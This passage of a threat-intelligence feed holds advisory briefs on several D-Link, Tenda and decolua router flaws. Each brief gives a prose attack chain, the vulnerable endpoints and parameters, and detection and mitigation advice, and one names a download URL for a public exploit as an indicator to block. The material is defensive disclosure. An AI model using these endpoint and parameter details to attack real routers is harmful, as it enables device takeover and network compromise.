The vulnerability resides in the \u003ccode\u003eformSetMACFilter\u003c/code\u003e function within the \u003ccode\u003e/goform/formSetMACFilter\u003c/code\u003e component\u0026rsquo;s POST Request Handler. A remote attacker can exploit this by sending a crafted POST request with a malicious \u003ccode\u003ecurTime\u003c/code\u003e argument, leading to a buffer overflow. Exploit code is publicly available. Due to the product\u0026rsquo;s end-of-life status, no patch is available, making unpatched devices highly vulnerable. This allows for potential remote code execution and complete compromise of the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DIR-605L router (version 2.13B01) exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/goform/formSetMACFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the POST request, the attacker includes the \u003ccode\u003ecurTime\u003c/code\u003e parameter, injecting a string exceeding the buffer\u0026rsquo;s expected size.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s \u003ccode\u003eformSetMACFilter\u003c/code\u003e function processes the POST request without proper bounds checking on the \u003ccode\u003ecurTime\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003ecurTime\u003c/code\u003e string overflows the buffer, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite critical data, such as return addresses or function pointers.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003eformSetMACFilter\u003c/code\u003e function attempts to return, the overwritten return address is used, redirecting execution to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on 
the router, potentially installing malware, changing configurations, or using the device for further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5980 allows a remote attacker to gain complete control over the vulnerable D-Link DIR-605L router. Given that the affected product is no longer supported, a large number of legacy routers remain vulnerable. Attackers can leverage compromised routers to establish botnets, conduct man-in-the-middle attacks, or gain unauthorized access to internal networks connected to the router. The lack of patches elevates the severity, as affected users have no direct mitigation available other than replacing the device.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect D-Link DIR-605L Buffer Overflow Attempt\u003c/code\u003e to identify malicious POST requests targeting the \u003ccode\u003e/goform/formSetMACFilter\u003c/code\u003e endpoint on D-Link DIR-605L devices.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to isolate potentially vulnerable D-Link DIR-605L routers to limit the impact of a successful compromise.\u003c/li\u003e\n\u003cli\u003eIf possible, replace D-Link DIR-605L routers (version 2.13B01) with newer, supported devices to eliminate the vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T21:16:14Z","date_published":"2026-04-09T21:16:14Z","id":"/briefs/2026-04-dlink-dir605l-buffer-overflow/","summary":"A buffer overflow vulnerability exists in the D-Link DIR-605L router version 2.13B01, allowing a remote attacker to execute arbitrary code by manipulating the `curTime` argument in the `formSetMACFilter` function.","title":"D-Link DIR-605L Router Buffer Overflow Vulnerability 
(CVE-2026-5980)","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-dir605l-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5979"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["dlink","router","buffer_overflow","cve-2026-5979"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA buffer overflow vulnerability, CVE-2026-5979, has been identified in D-Link DIR-605L router with firmware version 2.13B01. The vulnerability resides in the \u003ccode\u003eformVirtualServ\u003c/code\u003e function within the \u003ccode\u003e/goform/formVirtualServ\u003c/code\u003e component, specifically within the POST request handler. By manipulating the \u003ccode\u003ecurTime\u003c/code\u003e argument, a remote attacker can trigger a buffer overflow. According to the NVD, an exploit is publicly available, increasing the risk of exploitation. This vulnerability affects end-of-life products, making patching impossible.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable D-Link DIR-605L router running firmware 2.13B01.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/formVirtualServ\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes the \u003ccode\u003ecurTime\u003c/code\u003e argument with a value exceeding the buffer\u0026rsquo;s capacity.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s \u003ccode\u003eformVirtualServ\u003c/code\u003e function processes the POST request without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003ecurTime\u003c/code\u003e value overwrites adjacent memory regions on the stack or heap.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow payload to overwrite the return address.\u003c/li\u003e\n\u003cli\u003eUpon returning from the 
\u003ccode\u003eformVirtualServ\u003c/code\u003e function, control is transferred to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining full control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability (CVE-2026-5979) can lead to complete compromise of the D-Link DIR-605L router. Attackers could potentially execute arbitrary code, enabling them to modify router settings, intercept network traffic, or use the compromised device as a pivot point for further attacks within the network. Due to the product being end-of-life, a patch is not available. The number of vulnerable devices is unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor webserver logs for requests to \u003ccode\u003e/goform/formVirtualServ\u003c/code\u003e with unusually long \u003ccode\u003ecurTime\u003c/code\u003e parameters to detect potential exploitation attempts (see Sigma rule \u0026ldquo;Detect Suspiciously Long curTime Parameter in D-Link Routers\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (IDS) rules to detect suspicious traffic patterns associated with buffer overflow exploits targeting web interfaces.\u003c/li\u003e\n\u003cli\u003eSince this device is end-of-life, consider replacing the D-Link DIR-605L router with a supported model to mitigate the risk, as there will be no patches issued.\u003c/li\u003e\n\u003cli\u003eExamine network traffic for unusual outbound connections originating from D-Link DIR-605L routers to identify potentially compromised devices (see Sigma rule \u0026ldquo;Detect Outbound Connections from D-Link 
Routers\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T21:16:13Z","date_published":"2026-04-09T21:16:13Z","id":"/briefs/2026-04-dlink-dir605l-bo/","summary":"A remote buffer overflow vulnerability exists in the D-Link DIR-605L version 2.13B01 due to improper handling of the 'curTime' argument in the '/goform/formVirtualServ' POST request handler, potentially allowing attackers to execute arbitrary code.","title":"D-Link DIR-605L Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-dir605l-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5842"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve","authorization-bypass","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical security vulnerability, CVE-2026-5842, affects decolua 9router versions up to 0.3.47. The vulnerability resides within an unknown function of the \u003ccode\u003e/api\u003c/code\u003e endpoint, specifically the Administrative API. Successful exploitation of this flaw allows a remote attacker to bypass authorization controls, potentially gaining administrative privileges. A public exploit for this vulnerability has been disclosed, increasing the risk of exploitation. Organizations using vulnerable versions of decolua 9router should upgrade to version 0.3.75 as soon as possible to mitigate the risk. 
This vulnerability was published on April 9, 2026 and poses a significant threat due to the availability of a public exploit.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable decolua 9router instance running a version prior to 0.3.75.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/api\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request exploits the authorization bypass vulnerability in the targeted function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable application fails to properly validate the attacker\u0026rsquo;s authorization, granting them access.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to administrative functionalities.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the unauthorized access to modify router configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker can then potentially perform actions like changing DNS settings, creating rogue user accounts, or disrupting network services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5842 allows attackers to bypass authorization and gain unauthorized administrative access to the decolua 9router. This can lead to complete compromise of the router, allowing attackers to eavesdrop on network traffic, redirect traffic to malicious sites, or disrupt network services. Given the availability of a public exploit, vulnerable routers are at high risk of compromise. 
This vulnerability can have severe consequences for both home and business networks relying on decolua 9router.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade all decolua 9router instances to version 0.3.75 or later to remediate CVE-2026-5842.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity targeting the \u003ccode\u003e/api\u003c/code\u003e endpoint using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement firewall rules to restrict access to the administrative interface of the router.\u003c/li\u003e\n\u003cli\u003eReview and audit existing router configurations for any unauthorized changes after applying the provided Sigma rule to detect any potential intrusions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T05:16:06Z","date_published":"2026-04-09T05:16:06Z","id":"/briefs/2026-04-decolua-auth-bypass/","summary":"CVE-2026-5842 is an authorization bypass vulnerability in decolua 9router versions up to 0.3.47, allowing remote attackers to gain unauthorized access via manipulation of the /api endpoint.","title":"Decolua 9router Authorization Bypass Vulnerability (CVE-2026-5842)","url":"https://feed.craftedsignal.io/briefs/2026-04-decolua-auth-bypass/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5844"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","d-link","router","cve-2026-5844"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5844 describes a critical command injection vulnerability affecting D-Link DIR-882 routers running firmware version 1.01B02. The vulnerability resides in the \u003ccode\u003esprintf\u003c/code\u003e function within the \u003ccode\u003eprog.cgi\u003c/code\u003e script, specifically within the HNAP1 SetNetworkSettings Handler. 
A remote, unauthenticated attacker can exploit this flaw by manipulating the \u003ccode\u003eIPAddress\u003c/code\u003e argument, injecting arbitrary OS commands that are then executed with elevated privileges. The vulnerability is considered critical due to the potential for complete system compromise and the availability of a public exploit. This vulnerability impacts products that are no longer supported by the maintainer, increasing the risk for users who have not migrated to newer devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DIR-882 router running firmware version 1.01B02.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003eprog.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request targets the HNAP1 SetNetworkSettings Handler.\u003c/li\u003e\n\u003cli\u003eThe attacker manipulates the \u003ccode\u003eIPAddress\u003c/code\u003e argument within the HTTP request, injecting malicious OS commands.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esprintf\u003c/code\u003e function in \u003ccode\u003eprog.cgi\u003c/code\u003e processes the attacker-controlled \u003ccode\u003eIPAddress\u003c/code\u003e argument without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed on the router\u0026rsquo;s operating system due to the command injection vulnerability in \u003ccode\u003esprintf\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution on the router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as modifying router settings, eavesdropping on network traffic, or using the router as a botnet node.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5844 allows a remote attacker to execute arbitrary OS commands on 
the vulnerable D-Link DIR-882 router. This can lead to a complete compromise of the device, enabling attackers to reconfigure the router, intercept network traffic, or use the compromised device as part of a botnet. The vulnerability affects end-of-life products, meaning no official patches are available. The impact is significant due to the widespread use of these routers in home and small business networks, where they can act as a gateway to internal systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect D-Link DIR-882 Command Injection Attempt\u003c/code\u003e to detect suspicious requests to \u003ccode\u003eprog.cgi\u003c/code\u003e containing shell metacharacters.\u003c/li\u003e\n\u003cli\u003eBlock access to the URL \u003ccode\u003ehttps://files.catbox.moe/ei31k1.zip\u003c/code\u003e to prevent the download of the publicly available exploit (IOC).\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for HTTP requests to \u003ccode\u003eprog.cgi\u003c/code\u003e with unusually long \u003ccode\u003eIPAddress\u003c/code\u003e parameters (log source: webserver).\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) rules to identify and block exploit attempts targeting CVE-2026-5844 (log source: network_connection).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T05:16:06Z","date_published":"2026-04-09T05:16:06Z","id":"/briefs/2026-04-dlink-command-injection/","summary":"A command injection vulnerability (CVE-2026-5844) exists in the D-Link DIR-882 router version 1.01B02, allowing a remote attacker to execute arbitrary OS commands by manipulating the IPAddress argument in the HNAP1 SetNetworkSettings Handler via the prog.cgi script.","title":"D-Link DIR-882 Remote Command Injection Vulnerability 
(CVE-2026-5844)","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5830"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5830","tenda","router","buffer-overflow","stack-overflow"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, tracked as CVE-2026-5830, has been identified in Tenda AC15 routers running firmware version 15.03.05.18. The vulnerability resides in the \u003ccode\u003ewebsGetVar\u003c/code\u003e function within the \u003ccode\u003e/goform/SysToolChangePwd\u003c/code\u003e file, which handles password change requests. By crafting malicious requests and manipulating the \u003ccode\u003eoldPwd\u003c/code\u003e, \u003ccode\u003enewPwd\u003c/code\u003e, or \u003ccode\u003ecfmPwd\u003c/code\u003e arguments, an attacker can overwrite the stack, potentially leading to arbitrary code execution. The vulnerability is remotely exploitable by an authenticated user, and publicly available exploit code exists, increasing the risk of widespread exploitation. 
This poses a significant threat to home and small business networks using affected Tenda AC15 routers.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to the router\u0026rsquo;s web management interface, potentially through weak credentials or brute-forcing.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request to \u003ccode\u003e/goform/SysToolChangePwd\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes oversized data within the \u003ccode\u003eoldPwd\u003c/code\u003e, \u003ccode\u003enewPwd\u003c/code\u003e, or \u003ccode\u003ecfmPwd\u003c/code\u003e parameters.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ewebsGetVar\u003c/code\u003e function processes the request without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized data overflows the stack buffer, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite the return address on the stack.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ewebsGetVar\u003c/code\u003e function returns, diverting execution to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled address contains shellcode that executes arbitrary commands, potentially granting complete control over the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda AC15 router. This could lead to complete device compromise, including unauthorized access to network traffic, modification of router settings, installation of malware, and use of the compromised device as a botnet node. 
Given the potentially widespread use of Tenda AC15 routers in home and small business environments, a large number of devices could be vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches from Tenda to remediate CVE-2026-5830 as soon as they become available.\u003c/li\u003e\n\u003cli\u003eMonitor webserver logs for suspicious POST requests to \u003ccode\u003e/goform/SysToolChangePwd\u003c/code\u003e with unusually long \u003ccode\u003eoldPwd\u003c/code\u003e, \u003ccode\u003enewPwd\u003c/code\u003e, or \u003ccode\u003ecfmPwd\u003c/code\u003e parameters and deploy the Sigma rule \u003ccode\u003eDetect Tenda AC15 Password Change Overflow\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement strong password policies and multi-factor authentication to prevent unauthorized access to the router\u0026rsquo;s web management interface.\u003c/li\u003e\n\u003cli\u003eRestrict access to the router\u0026rsquo;s web management interface to trusted networks only by configuring firewall rules.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T02:16:17Z","date_published":"2026-04-09T02:16:17Z","id":"/briefs/2026-04-tenda-ac15-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5830) in Tenda AC15 firmware version 15.03.05.18 allows remote attackers to execute arbitrary code by manipulating password change parameters, potentially leading to complete device compromise.","title":"Tenda AC15 Router Stack-Based Buffer Overflow (CVE-2026-5830)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-ac15-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["d-link","router","airsnitch","vulnerability","network-traffic-manipulation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u0026lsquo;Airsnitch\u0026rsquo; vulnerability affects D-LINK Router models M60 
and DIR-3040. An attacker positioned within an adjacent network can exploit this flaw to circumvent security protocols. This access allows the attacker to potentially expose sensitive data and manipulate network traffic. The specifics of the vulnerability exploitation are not detailed in this advisory, but the impact suggests a significant compromise of network security and data integrity. Defenders should prioritize identifying and mitigating this vulnerability to prevent unauthorized access and data breaches. This vulnerability poses a risk to both home and enterprise networks utilizing the affected D-LINK router models.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to an adjacent network, either physically or via compromised wireless access.\u003c/li\u003e\n\u003cli\u003eAttacker sends crafted network packets targeting the D-LINK router\u0026rsquo;s management interface.\u003c/li\u003e\n\u003cli\u003eThe \u0026lsquo;Airsnitch\u0026rsquo; vulnerability is exploited, bypassing authentication or authorization checks.\u003c/li\u003e\n\u003cli\u003eAttacker gains unauthorized access to the router\u0026rsquo;s configuration settings.\u003c/li\u003e\n\u003cli\u003eAttacker modifies DNS settings to redirect traffic to malicious servers.\u003c/li\u003e\n\u003cli\u003eAttacker intercepts and analyzes network traffic, capturing sensitive information like usernames and passwords.\u003c/li\u003e\n\u003cli\u003eAttacker injects malicious code into network traffic, potentially compromising other devices on the network.\u003c/li\u003e\n\u003cli\u003eAttacker maintains persistent access by creating a rogue administrator account or installing malicious firmware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of the \u0026lsquo;Airsnitch\u0026rsquo; vulnerability can lead to significant compromise of network security. 
Attackers can gain unauthorized access to sensitive information, manipulate network traffic, and potentially compromise other devices on the network. This can result in data breaches, financial losses, and reputational damage. The number of potential victims is significant, given the widespread use of D-LINK routers in both home and enterprise environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAnalyze network traffic for suspicious patterns indicative of unauthorized access attempts to the D-LINK router\u0026rsquo;s management interface to facilitate tuning of existing firewall rules and creation of new rules.\u003c/li\u003e\n\u003cli\u003eMonitor DNS settings on D-LINK routers for unauthorized modifications using network monitoring tools.\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies on the adjacent network to limit the attacker\u0026rsquo;s ability to reach the D-LINK routers.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T09:58:56Z","date_published":"2026-04-08T09:58:56Z","id":"/briefs/2026-04-dlink-router-vulnerability/","summary":"The 'Airsnitch' vulnerability in D-LINK Router M60 and DIR-3040 allows an attacker from an adjacent network to bypass security measures, disclose confidential information, and manipulate network traffic.","title":"D-LINK Router M60 and DIR-3040 'Airsnitch' Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-router-vulnerability/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5686"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5686","tenda","router","stack-based buffer overflow","remote code execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5686 is a critical vulnerability affecting Tenda CX12L routers running firmware version 16.03.53.12. 
This stack-based buffer overflow is located in the \u003ccode\u003efromRouteStatic\u003c/code\u003e function within the \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e file. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request with a malicious \u003ccode\u003epage\u003c/code\u003e argument. Publicly available exploit code exists, increasing the risk of widespread exploitation. Successful exploitation could lead to arbitrary code execution, potentially allowing attackers to gain full control of the affected router. This poses a significant risk to home and small business networks using the vulnerable device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Tenda CX12L router running firmware version 16.03.53.12.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP POST request to \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe request includes a \u003ccode\u003epage\u003c/code\u003e argument with a string exceeding the buffer size allocated to the \u003ccode\u003efromRouteStatic\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003epage\u003c/code\u003e argument overwrites adjacent memory on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003efromRouteStatic\u003c/code\u003e function returns, it attempts to jump to the overwritten return address controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s payload, injected via the overflowed buffer, is executed with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution on the router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use the compromised router as a foothold for further attacks, such as network reconnaissance, lateral movement, or data 
exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5686 allows a remote attacker to execute arbitrary code on the affected Tenda CX12L router. This could lead to a complete compromise of the device, enabling attackers to modify router settings, intercept network traffic, or use the router as a proxy for malicious activities. Given the widespread use of Tenda routers in home and small business networks, this vulnerability could have a significant impact, potentially affecting thousands of users. A successful attack could lead to data breaches, service disruptions, and further compromise of connected devices within the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates provided by Tenda to address CVE-2026-5686.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e with unusually long \u003ccode\u003epage\u003c/code\u003e parameters, using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) to detect and block exploit attempts targeting this vulnerability.\u003c/li\u003e\n\u003cli\u003eRestrict access to the router\u0026rsquo;s administrative interface to trusted networks or IP addresses to limit the attack surface.\u003c/li\u003e\n\u003cli\u003eRegularly review router configurations and security settings to ensure they align with best practices.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T22:16:24Z","date_published":"2026-04-06T22:16:24Z","id":"/briefs/2026-04-tenda-cx12l-stack-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5686) exists in the Tenda CX12L router version 16.03.53.12, allowing remote attackers to potentially execute arbitrary code by manipulating the 'page' 
argument in the `/goform/RouteStatic` endpoint.","title":"Tenda CX12L Router Stack-Based Buffer Overflow Vulnerability (CVE-2026-5686)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-cx12l-stack-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8,"id":"CVE-2026-5684"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["tenda","router","buffer-overflow","cve-2026-5684"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability has been identified in Tenda CX12L routers running firmware version 16.03.53.12. The vulnerability resides within the \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function in the \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e file. An attacker with local network access can exploit this flaw by manipulating the \u003ccode\u003epage\u003c/code\u003e argument passed to this function, leading to arbitrary code execution on the device. The vulnerability, identified as CVE-2026-5684, has a CVSS v3.1 score of 8.0, indicating a high severity. Public exploits for this vulnerability are available, making it crucial for network administrators to address this issue promptly. 
Successful exploitation could allow an attacker to gain complete control of the router, potentially leading to data theft, network compromise, or denial of service.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to the local network where the Tenda CX12L router is located.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003epage\u003c/code\u003e argument with a payload exceeding the buffer size allocated for it within the \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe router processes the HTTP request and passes the overly long \u003ccode\u003epage\u003c/code\u003e argument to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function attempts to write the contents of the \u003ccode\u003epage\u003c/code\u003e argument into a fixed-size buffer on the stack.\u003c/li\u003e\n\u003cli\u003eDue to the excessive length of the \u003ccode\u003epage\u003c/code\u003e argument, the buffer overflows, overwriting adjacent memory regions on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the buffer overflow to overwrite the return address on the stack with the address of malicious code or a ROP chain.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function returns, control is transferred to the attacker-controlled code, allowing for arbitrary code execution.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5684 allows an attacker with local network access to gain complete control of the affected Tenda CX12L router. 
This can lead to a variety of malicious activities, including unauthorized access to network traffic, modification of router settings, deployment of malicious firmware, and use of the compromised router as a botnet node. Given the availability of public exploits, organizations using this router model are at significant risk. The number of potential victims is dependent on the number of unpatched Tenda CX12L devices deployed.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor webserver logs for HTTP requests targeting the \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e endpoint with abnormally long \u003ccode\u003epage\u003c/code\u003e parameters to detect potential exploitation attempts. (Log Source: webserver, Rule: \u0026ldquo;Detect Tenda CX12L Web Request with Long Page Parameter\u0026rdquo;)\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda CX12L Stack Buffer Overflow Attempt\u0026rdquo; to identify suspicious process creations following a potential exploit.\u003c/li\u003e\n\u003cli\u003eReview and restrict local network access to the Tenda CX12L router to reduce the attack surface, as the exploit requires local network access.\u003c/li\u003e\n\u003cli\u003eContact Tenda for a security patch or firmware update to address CVE-2026-5684.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T22:16:24Z","date_published":"2026-04-06T22:16:24Z","id":"/briefs/2026-04-tenda-cx12l-buffer-overflow/","summary":"A stack-based buffer overflow vulnerability exists in the Tenda CX12L router (version 16.03.53.12) due to improper handling of the 'page' argument in the 'fromwebExcptypemanFilter' function, potentially allowing attackers with local network access to execute arbitrary code.","title":"Tenda CX12L Router Stack-Based Buffer Overflow 
